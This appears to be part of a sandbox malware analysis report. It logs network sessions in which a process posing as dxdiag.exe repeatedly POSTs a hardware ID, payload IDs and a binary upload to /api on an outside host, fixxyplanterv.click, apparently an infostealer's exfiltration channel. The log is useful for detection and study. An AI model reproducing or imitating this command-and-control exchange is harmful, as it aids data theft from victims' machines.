4994bAmkOpdekI6TunvXFOTosBPo6+4V5Devc8byvhZkS2UXK9IYrWq8rODfWe1glp3VP8qKijfeUc4ftZeSNBImR1ZvxVbkO7ys9sJZ7U+fytV9ytHMcI5Vzh+kk9V5FCcGBGXDUvI99O//1x6ycYWC3nqFg4M3yBXKCeTInFsBPwQhaNdRtSO89bHfFfUuxonVcYSNin6MX8cXpZbUZg0tDQRrwFP4NODi9dAVtHuFypwx
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 6a 5a 48 4d 4c 38 59 47 2f 78 4b 31 67 63 6c 35 46 69 39 48 45 53 58 66 47 50 49 77 73 72 53 78 30 42 57 37 63 34 57 46 31 58 43 4b 6d 34 4e 33 68 56 33 46 46 61 36 66 30 33 73 49 49 77 41 47 59 73 46 58 38 6a 54 30 34 2f 4b 59 56 2f 56 78 6e 73 71 4b 4d 61 71 5a 6a 33 53 53 57 4e 78 52 75 39 37 46 4e 41 45 6c 52 31 59 72 77 46 62 30 4d 66 4c 2b 2b 64 4d 53 73 47 53 4e 67 39 39 38 69 6f 53 47 65 49 56 56 79 68 75 75 6e 39 5a 77 43 79 51 42 44 6d 75 47 46 72 55 37 36 71 79 70 6d 44 71 77 5a 6f 47 47 78 44 4f 77 79 5a 4d 35 6e 78 58 4b 48 65 54 49 6e 48 77 44 4b 67 51 46 5a 4d 56 51 2f 69 37 79 2f 76 66 56 48 4b 64 77 67 34 54 59 63 70 69 44 67 6e 47 46 58 4d 59 59 6f 5a 66 59 4e 45 68 70 41 42 59 72 6e 68 6a 55 4d 66 6e 67 2b 38 38 5a 39 57 6e 49 6b 35 4a Data Ascii: jZHML8YG/xK1gcl5Fi9HESXfGPIwsrSx0BW7c4WF1XCKm4N3hV3FFa6f03sIIwAGYsFX8jT04/KYV/VxnsqKMaqZj3SSWNxRu97FNAElR1YrwFb0MfL++dMSsGSNg998ioSGeIVVyhuun9ZwCyQBDmuGFrU76qypmDqwZoGGxDOwyZM5nxXKHeTInHwDKgQFZMVQ/i7y/vfVHKdwg4TYcpiDgnGFXMYYoZfYNEhpABYrnhjUMfng+88Z9WnIk5J
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 6e 47 4a 57 4d 46 52 36 74 44 62 62 45 5a 78 52 79 52 6f 30 6c 76 2f 66 73 66 76 2f 39 59 65 6f 7a 61 5a 78 4d 73 78 6a 59 58 4d 4c 38 5a 59 7a 42 6d 69 67 74 4e 35 42 53 63 4a 41 57 37 4a 55 50 55 38 2f 2b 6e 31 30 78 4b 32 65 34 4b 59 32 48 47 43 6a 49 31 39 6a 42 57 44 55 61 4f 49 6e 43 78 47 47 42 41 46 4b 66 4e 62 2b 7a 4c 31 2b 72 48 48 56 36 77 32 67 59 61 53 4b 63 71 45 68 48 4b 44 57 73 77 62 71 70 58 57 65 41 34 6e 42 42 78 6b 77 6c 6a 35 4e 50 6a 68 2f 39 77 52 76 48 32 4e 6a 4e 4a 77 67 4d 6e 43 4e 34 46 4e 6a 55 6e 6b 70 4e 74 34 43 79 5a 46 4f 32 6a 49 56 76 49 71 73 76 4f 2f 77 56 6d 79 65 73 62 53 6b 6e 32 44 69 59 64 39 67 6c 58 4b 48 4b 47 54 32 33 63 4c 4c 67 30 41 62 4d 4a 55 2f 44 48 30 37 50 62 63 48 4b 64 7a 6a 34 62 65 4d 63 54 4a Data Ascii: nGJWMFR6tDbbEZxRyRo0lv/fsfv/9YeozaZxMsxjYXML8ZYzBmigtN5BScJAW7JUPU8/+n10xK2e4KY2HGCjI19jBWDUaOInCxGGBAFKfNb+zL1+rHHV6w2gYaSKcqEhHKDWswbqpXWeA4nBBxkwlj5NPjh/9wRvH2NjNJwgMnCN4FNjUnkpNt4CyZFO2jIVvIqsvO/wVmyesbSkn2DiYd9glXKHKGT23cLLg0AbMJU/DH07PbcHKdzj4beMcTJ
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 76 55 55 61 4f 63 6e 43 78 47 49 41 34 63 5a 63 68 52 2b 44 72 36 36 2f 2f 56 45 72 4e 39 67 59 33 55 66 49 4b 45 69 58 53 48 55 63 63 44 70 35 76 57 65 51 78 70 53 55 35 73 33 68 69 74 66 4e 58 67 32 4d 67 43 70 32 44 47 6c 5a 78 6f 79 6f 36 41 4e 39 34 56 7a 68 36 74 6e 39 52 38 43 53 59 44 41 47 33 41 56 66 41 7a 2b 50 37 35 31 68 53 2b 65 59 32 59 30 6e 79 4f 68 59 68 2f 6a 56 2b 4e 58 2b 53 58 78 44 52 65 61 54 49 44 5a 4d 5a 62 34 33 7a 74 6f 75 69 59 48 72 6b 32 33 73 72 65 66 34 71 47 67 48 75 4e 58 63 77 64 71 70 66 5a 66 51 34 68 46 51 39 76 7a 6c 6e 37 4d 2f 50 6f 39 4e 30 64 73 6e 4b 41 68 5a 49 2f 79 6f 36 55 4e 39 34 56 34 6a 61 52 30 76 31 4f 52 6a 5a 4a 46 79 76 42 56 4c 56 6b 73 75 44 79 31 42 47 36 63 49 2b 47 32 48 69 42 68 59 64 7a 69 Data Ascii: vUUaOcnCxGIA4cZchR+Dr66//VErN9gY3UfIKEiXSHUccDp5vWeQxpSU5s3hitfNXg2MgCp2DGlZxoyo6AN94Vzh6tn9R8CSYDAG3AVfAz+P751hS+eY2Y0nyOhYh/jV+NX+SXxDReaTIDZMZb43ztouiYHrk23sref4qGgHuNXcwdqpfZfQ4hFQ9vzln7M/Po9N0dsnKAhZI/yo6UN94V4jaR0v1ORjZJFyvBVLVksuDy1BG6cI+G2HiBhYdzi
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 72 6b 64 31 79 46 43 34 4f 48 47 58 4c 56 2f 30 30 2b 2b 33 31 33 52 53 7a 65 6f 79 4c 31 58 2b 45 67 63 77 35 78 6c 4c 56 55 66 7a 51 2f 57 51 64 4f 78 45 44 53 73 74 58 74 53 4f 38 39 62 48 66 46 66 55 75 78 6f 50 41 64 59 65 62 68 58 43 49 57 73 34 44 70 5a 33 58 5a 67 45 6d 41 77 6c 6e 77 46 66 7a 50 66 66 6d 2f 64 38 63 76 6e 6d 4b 79 70 77 78 6a 5a 48 4d 4c 38 5a 37 78 67 4b 7a 6b 39 4a 2f 45 44 4a 48 45 53 58 66 47 50 49 77 73 72 53 78 32 78 4b 2b 63 6f 61 47 30 6e 57 48 69 5a 35 34 67 56 4c 45 47 72 61 61 32 33 4d 4e 49 51 77 42 62 64 52 55 2b 79 37 33 2f 75 4f 59 56 2f 56 78 6e 73 71 4b 4d 62 79 4f 6e 47 65 46 46 2f 77 48 70 34 62 58 65 51 70 70 47 45 42 79 68 6c 2f 35 66 4b 71 73 39 39 63 51 74 6e 6d 48 67 39 35 38 6a 34 43 4a 64 6f 42 52 78 78 Data Ascii: rkd1yFC4OHGXLV/00++313RSzeoyL1X+Egcw5xlLVUfzQ/WQdOxEDSstXtSO89bHfFfUuxoPAdYebhXCIWs4DpZ3XZgEmAwlnwFfzPffm/d8cvnmKypwxjZHML8Z7xgKzk9J/EDJHESXfGPIwsrSx2xK+coaG0nWHiZ54gVLEGraa23MNIQwBbdRU+y73/uOYV/VxnsqKMbyOnGeFF/wHp4bXeQppGEByhl/5fKqs99cQtnmHg958j4CJdoBRxx
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 4e 42 6c 6e 48 6b 35 73 79 68 69 74 66 50 48 72 38 74 6b 54 76 48 71 4a 6a 64 5a 6a 67 49 36 65 64 6f 64 65 77 42 32 6b 6e 64 46 2b 42 79 41 4b 41 6d 62 42 58 2f 6f 35 73 71 4b 78 33 77 48 31 4c 73 61 72 33 33 71 47 30 74 59 33 6d 52 76 55 55 61 4f 63 6e 43 78 47 4b 51 30 4c 59 63 74 62 2b 6a 2f 67 37 66 66 4b 47 62 68 38 6c 49 44 5a 64 49 65 45 67 58 53 41 55 38 59 64 74 70 6e 63 64 77 31 70 53 55 35 73 33 68 69 74 66 4e 48 37 35 39 49 65 75 57 43 4e 69 39 46 6e 68 35 6e 4d 4f 63 5a 45 79 67 44 6b 79 4d 70 6b 45 53 34 59 51 48 4b 47 58 2f 6c 38 71 71 7a 33 30 52 2b 79 63 49 69 59 31 33 65 46 68 6f 56 2b 67 6c 33 4f 45 61 43 55 32 33 45 46 4a 51 77 4a 61 4d 6c 63 2f 44 4c 37 34 37 47 57 57 62 4a 75 78 74 4b 53 55 4a 47 4b 67 48 72 47 53 6f 4d 49 35 4a 66 Data Ascii: NBlnHk5syhitfPHr8tkTvHqJjdZjgI6edodewB2kndF+ByAKAmbBX/o5sqKx3wH1Lsar33qG0tY3mRvUUaOcnCxGKQ0LYctb+j/g7ffKGbh8lIDZdIeEgXSAU8Ydtpncdw1pSU5s3hitfNH759IeuWCNi9Fnh5nMOcZEygDkyMpkES4YQHKGX/l8qqz30R+ycIiY13eFhoV+gl3OEaCU23EFJQwJaMlc/DL747GWWbJuxtKSUJGKgHrGSoMI5Jf
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 55 64 57 4b 2b 5a 54 34 7a 6e 31 2b 72 50 74 47 72 74 34 67 5a 79 53 62 72 58 48 7a 48 69 63 46 5a 55 6f 76 64 44 62 65 45 5a 78 52 78 74 73 78 6c 2f 76 4b 76 58 67 34 4e 4d 55 75 56 53 4a 6a 63 52 79 68 59 71 64 66 73 70 65 77 46 48 71 30 4e 74 73 52 6e 46 48 49 57 7a 51 57 39 6f 2f 34 2b 57 78 6c 6c 6d 79 59 4d 62 53 6b 6b 2f 4b 6d 34 39 6e 68 56 72 63 4c 2b 54 49 78 55 70 47 49 68 45 4a 65 38 56 4f 2f 6a 48 2b 2f 63 2b 59 51 65 45 6b 31 4e 69 41 49 35 58 4a 6b 30 6a 49 46 63 78 52 2f 4b 6e 46 4e 42 42 70 58 31 77 6c 68 6b 71 31 5a 4c 4b 72 38 73 6f 4c 73 33 57 51 69 5a 56 50 74 4b 36 61 66 59 46 46 79 67 61 72 30 4a 49 30 43 57 6c 66 4e 79 76 50 58 2b 34 74 35 4f 48 68 33 31 6d 4b 4f 4d 61 53 6b 69 6e 4b 76 49 39 35 69 46 4c 62 41 4f 6d 33 79 6e 34 42 Data Ascii: UdWK+ZT4zn1+rPtGrt4gZySbrXHzHicFZUovdDbeEZxRxtsxl/vKvXg4NMUuVSJjcRyhYqdfspewFHq0NtsRnFHIWzQW9o/4+WxllmyYMbSkk/Km49nhVrcL+TIxUpGIhEJe8VO/jH+/c+YQeEk1NiAI5XJk0jIFcxR/KnFNBBpX1wlhkq1ZLKr8soLs3WQiZVPtK6afYFFygar0JI0CWlfNyvPX+4t5OHh31mKOMaSkinKvI95iFLbAOm3yn4B
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 65 47 46 72 55 70 2b 65 44 33 31 51 7a 36 5a 35 43 4a 78 48 62 47 67 5a 31 36 69 68 58 79 58 2b 53 49 6e 43 78 47 48 41 51 41 5a 63 46 4f 35 48 48 53 35 2f 33 62 46 62 52 78 78 73 53 53 64 38 72 52 33 7a 6e 47 55 64 78 52 2f 4d 43 4f 4c 31 4e 36 55 46 34 35 32 52 62 73 66 4f 53 73 71 59 70 58 39 57 54 47 30 70 49 32 69 5a 75 65 63 59 56 44 7a 6c 61 61 72 74 31 35 43 57 55 4a 42 57 76 42 53 4f 4d 6e 76 75 54 79 77 67 4f 4c 53 4b 32 47 31 48 61 51 6a 6f 70 52 70 68 57 44 55 61 76 51 68 45 31 47 59 55 63 78 4a 59 5a 41 74 57 53 79 32 66 4c 57 46 37 4a 67 6c 38 66 36 55 72 43 7a 7a 6c 75 42 51 49 38 6c 6f 34 44 4e 66 77 73 6c 52 30 41 72 77 42 69 74 62 4c 79 73 39 63 6c 5a 37 53 62 55 30 59 63 69 33 64 6e 65 61 4d 68 4d 6a 51 66 6b 79 49 34 36 52 6a 74 48 56 Data Ascii: eGFrUp+eD31Qz6Z5CJxHbGgZ16ihXyX+SInCxGHAQAZcFO5HHS5/3bFbRxxsSSd8rR3znGUdxR/MCOL1N6UF452RbsfOSsqYpX9WTG0pI2iZuecYVDzlaart15CWUJBWvBSOMnvuTywgOLSK2G1HaQjopRphWDUavQhE1GYUcxJYZAtWSy2fLWF7Jgl8f6UrCzzluBQI8lo4DNfwslR0ArwBitbLys9clZ7SbU0Yci3dneaMhMjQfkyI46RjtHV
2025-01-13 07:34:42 UTC	1369	IN	Data Raw: 74 62 37 79 73 34 35 68 42 39 54 47 49 68 39 4e 79 68 49 71 65 5a 59 42 57 32 78 4c 6a 72 75 4a 52 43 79 51 43 41 47 7a 34 5a 74 51 32 34 75 48 2b 33 31 75 56 63 5a 43 4a 37 45 2b 39 6d 49 74 6e 78 48 50 4f 42 36 66 51 6b 6a 51 65 61 56 39 4f 53 73 78 49 2b 44 50 31 72 74 48 66 44 37 59 32 79 4d 72 57 4d 64 4c 4a 71 58 71 4c 55 4d 4d 57 35 72 48 57 5a 41 73 6d 41 45 78 4c 77 55 37 32 66 4c 79 73 2f 5a 68 42 39 58 65 4d 6d 74 39 2b 6a 63 57 4c 62 59 45 56 67 31 47 71 30 49 51 30 42 79 4d 58 41 32 54 42 46 50 4d 79 2f 4b 7a 75 6c 67 44 31 59 4d 62 53 67 54 2f 4b 6d 38 77 76 78 68 4c 4f 41 37 61 57 33 32 49 46 62 6a 6b 77 52 74 52 66 35 54 2b 77 33 66 7a 63 44 36 42 31 6c 6f 33 73 54 36 65 62 69 32 65 46 46 2f 77 48 70 35 44 53 63 30 5a 6e 52 78 59 72 6e 68 Data Ascii: tb7ys45hB9TGIh9NyhIqeZYBW2xLjruJRCyQCAGz4ZtQ24uH+31uVcZCJ7E+9mItnxHPOB6fQkjQeaV9OSsxI+DP1rtHfD7Y2yMrWMdLJqXqLUMMW5rHWZAsmAExLwU72fLys/ZhB9XeMmt9+jcWLbYEVg1Gq0IQ0ByMXA2TBFPMy/KzulgD1YMbSgT/Km8wvxhLOA7aW32IFbjkwRtRf5T+w3fzcD6B1lo3sT6ebi2eFF/wHp5DSc0ZnRxYrnh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:42 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TP4A0GOX3LS9EZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12820 Host: fixxyplanterv.click
2025-01-13 07:34:42 UTC	12820	OUT	Data Raw: 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c 53 39 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 54 50 34 41 30 47 4f 58 33 4c Data Ascii: --TP4A0GOX3LS9EZContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--TP4A0GOX3LS9EZContent-Disposition: form-data; name="pid"2--TP4A0GOX3LS9EZContent-Disposition: form-data; name="lid"ZqchOa--new--TP4A0GOX3L
2025-01-13 07:34:43 UTC	1140	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mrigcvt9jpoi5s06nqofjjr005; expires=Fri, 09 May 2025 01:21:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2Fr%2FcYDUHDmlgO9vyq2oCUcpGbSELcD1J8J6x7D%2BcTq4cGRJB9t%2BwRF7Y7DbC8yVvqI0oPFcXE9%2BbfjNbRmIZtqIUTpuf%2Fncd1QMd%2FPpsEWrjJqb%2F459xC4K%2BXXH3zYCFkutf4OZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4957f9a5e67-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1653&rtt_var=633&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13759&delivery_rate=1711606&cwnd=245&unsent_bytes=0&cid=4252184c561cc7c1&ts=412&x=0"
2025-01-13 07:34:43 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:43 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HS01DAG7DF0S User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15037 Host: fixxyplanterv.click
2025-01-13 07:34:43 UTC	15037	OUT	Data Raw: 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 53 30 31 44 41 47 37 44 46 30 53 0d 0a 43 6f Data Ascii: --HS01DAG7DF0SContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--HS01DAG7DF0SContent-Disposition: form-data; name="pid"2--HS01DAG7DF0SContent-Disposition: form-data; name="lid"ZqchOa--new--HS01DAG7DF0SCo
2025-01-13 07:34:44 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bt0gp9p6ilahulrcart1vtojus; expires=Fri, 09 May 2025 01:21:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGPjhnsLW7zWzQQzG573%2FDMXZwBi6oNAoBPmC3sXxpdZOlyy%2FIovRoYwc2rGRVYh%2BYWbd5FGwiJP9uh3VL6Vx8lTkMGU0jiD1pVOUw0dmjcW4XEocmiSOQB6C7fK%2Bla6bt0gREJS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b49bbc517277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1834&rtt_var=696&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15974&delivery_rate=1592148&cwnd=225&unsent_bytes=0&cid=b5256d73e1b28741&ts=561&x=0"
2025-01-13 07:34:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49711	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:44 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AY3AN2ECC6589A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20216 Host: fixxyplanterv.click
2025-01-13 07:34:44 UTC	15331	OUT	Data Raw: 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36 Data Ascii: --AY3AN2ECC6589AContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--AY3AN2ECC6589AContent-Disposition: form-data; name="pid"3--AY3AN2ECC6589AContent-Disposition: form-data; name="lid"ZqchOa--new--AY3AN2ECC6
2025-01-13 07:34:44 UTC	4885	OUT	Data Raw: 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2025-01-13 07:34:45 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=63cbm13qp5shpkcrtnt04ol2nj; expires=Fri, 09 May 2025 01:21:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vii8cjtp0UKniP4pvdUdfk3Lykm7XzyYNcujdmXTu4uODEJi9O7KHa7BxU%2B8O%2FKrntX2lfhbLqfRKxtIe9A6Gsy34xQMEPb9jND5taJ1jMxHwYgCGdyV9l3lkM3kwe%2FM3qT8JzsI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b4a33b54433f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1667&rtt_var=629&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21177&delivery_rate=1736028&cwnd=222&unsent_bytes=0&cid=6ee4fa098517992d&ts=914&x=0"
2025-01-13 07:34:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49712	104.21.6.116	443	1984	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:47 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XFO1FXWQ01JO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1221 Host: fixxyplanterv.click
2025-01-13 07:34:47 UTC	1221	OUT	Data Raw: 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f Data Ascii: --XFO1FXWQ01JOContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--XFO1FXWQ01JOContent-Disposition: form-data; name="pid"1--XFO1FXWQ01JOContent-Disposition: form-data; name="lid"ZqchOa--new--XFO1FXWQ01JOCo
2025-01-13 07:34:47 UTC	1136	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rre3jv0o7hua5n2t9im622em1r; expires=Fri, 09 May 2025 01:21:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 